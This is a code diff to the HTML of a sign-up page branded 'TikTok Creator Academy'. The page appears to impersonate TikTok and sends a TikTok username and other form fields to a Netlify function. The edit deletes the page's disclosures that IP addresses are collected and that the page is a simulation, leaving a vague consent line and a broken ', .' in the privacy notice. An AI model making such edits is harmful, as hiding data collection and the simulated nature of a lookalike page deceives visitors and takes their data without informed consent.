--- a/index.html
+++ b/index.html
@@ -11,7 +11,7 @@
         <img src="https://www.tiktok.com/creator-academy/static/logo.png" alt="TikTok Creator Academy Logo" class="logo">
         <h1>Join TikTok Creator Academy</h1>
         <p>Sign up to access free courses, analytics tools, and creator resources!</p>
-        <p class="privacy-notice">By submitting, you consent to our <a href="https://www.tiktok.com/legal/page/global/privacy-policy/en" target="_blank">Privacy Policy</a>, including IP address collection.</p>
+        <p class="privacy-notice">By submitting, you consent to our <a href="https://www.tiktok.com/legal/page/global/privacy-policy/en" target="_blank">Privacy Policy</a>, .</p>
         <form id="registration-form" action="/.netlify/functions/submit" method="POST">
             <label for="username">TikTok Username</label>
             <input type="text" id="username" name="username" required>
@@ -33,7 +33,7 @@
             
             <label class="consent-label">
                 <input type="checkbox" name="consent" required>
-                I consent to data collection, including my IP address, for this simulation.
+                I consent to data collection. 
             </label>
             
             <button type="submit">Join Now</button>
